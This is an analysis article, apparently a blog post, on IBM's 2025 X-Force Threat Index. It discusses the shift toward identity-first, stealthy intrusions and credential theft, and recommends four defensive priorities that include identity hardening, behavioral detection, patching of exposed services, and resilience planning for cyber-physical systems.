IBM’s 2025 X-Force Threat Index signals a turning point in how defenders should prioritize their work. Attackers are increasingly favoring stealthy, identity-first intrusions and data theft over the noisy, file-encrypting campaigns that dominated headlines in prior years. That change is not a simple tactical pivot by adversaries. It is an operational cue that organizations must move from a prevention-only mindset toward purposeful resilience designed around identity, detection, and rapid containment.
The headline statistics are blunt and actionable. X-Force observed large increases in credential harvesting and credential-stealing email campaigns, with nearly one in three incidents involving credential theft and an 84 percent surge in infostealer delivery via email in 2024. Simultaneously, ransomware as a proportion of malware cases declined even as extortion remained a threat. Those patterns point to adversaries optimizing for quick access and fast monetization while trying to avoid detection. Defenders therefore need to assume compromise and design systems that limit attacker residence, lateral movement, and exfiltration rather than only trying to keep attackers out.
Two technical trends in the report deserve special emphasis for defense planners. First, identity abuse and the use of valid accounts are now a dominant initial access vector. X-Force found that identity-based attacks accounted for roughly 30 percent of intrusions and that nearly one in three attacks used valid accounts. This elevates the importance of authentication hygiene, session monitoring, and rapid credential revocation as primary defensive controls. Second, public-facing application exploitation and the rapid public availability of exploit code make internet-exposed services high-risk attack surfaces. Both trends favor defenders who operate continuous exposure inventories, prioritize rapid patching for externally visible assets, and remove unnecessary internet-facing services.
The report also documents a disturbing operational tradecraft shift. Adversaries are increasingly leaning on proxy malware and living-off-the-land techniques to hide in plain sight, use cloud infrastructure for command and control, and forward requests to evade network detection. These tactics complicate signature-based defenses and increase the value of behavioral telemetry, endpoint detection, and cloud workload inspection capabilities. Threat hunting that looks for abnormal account behavior, unusual command chains, or unexpected outbound proxying must become routine.
For defense contexts where cyber attacks have kinetic consequences, the implications are urgent. X-Force reported that critical infrastructure organizations represented a substantial share of incidents to which they responded. When an adversary gains access through credential theft or exploits a public-facing service, the path to operational impact is shorter in systems that blur IT and OT boundaries. That demands tailored resilience planning: multifactor authentication for operational accounts, segmented networks with enforceable access policies, and fail-safe modes that limit unsafe actions when trust is ambiguous. The goal is not zero risk. It is predictable, recoverable operations under attack.
Where should defenders invest to close the gap the X-Force index exposes? I recommend four prioritized lines of effort:
1) Harden identity and session lifecycles. Move beyond password rules to modernized authentication management. Enforce strong multi-factor authentication, use risk-based adaptive controls, instrument session behavior, and automate credential revocation. Assume credentials will be harvested and build rapid containment processes accordingly.
2) Elevate detection centered on living-off-the-land and proxy behavior. Expand telemetry across endpoints, cloud workloads, and network egress points. Use behavioral analytics and proactive hunting to find anomalous use of legitimate tools or covert proxying activity. Detection needs to be able to spot stealth, not just noise.
3) Reduce internet-facing attack surface and accelerate patching. Maintain a continuous inventory of public-facing applications and prioritize remediation of vulnerabilities that are publicly exploitable or have exploit code available. Where rapid patching is impossible, apply compensating controls such as strict access proxies and host-based restrictions.
4) Bake resilience into cyber-physical operations. For systems with kinetic effects, integrate cyber incident response with operational continuity planning. Tabletop scenarios should include credential compromise, stealthy persistence, and chained exploitation of public apps to kinetic impact. Segment control plane access and require out-of-band verification for any safety-critical changes.
A forward-looking point worth calling out is AI-related attack surface expansion. X-Force noted emerging vulnerabilities in AI frameworks and MLOps platforms as organizations scale generative AI and automation. Those platforms introduce new assets to inventory and new supply chain dependencies that can be abused by adversaries. Protecting model training pipelines, secrets used in MLOps, and the integrity of inference hosts should be part of any resilience plan that anticipates hybrid cyber-kinetic consequences.
The shift the X-Force index describes is already underway. Attackers are choosing stealth and speed. Defenders must choose resilience and deliberate containment. That means investing in identity controls, telemetry-driven detection, rigorous exposure management, and operations-aware incident playbooks. For organizations responsible for systems that tie digital compromise to physical outcomes, the time to build those capabilities is now. The window between initial access and real-world impact is shrinking. Resilience is the only practical strategy to keep critical systems safe under persistent, identity-first threat models.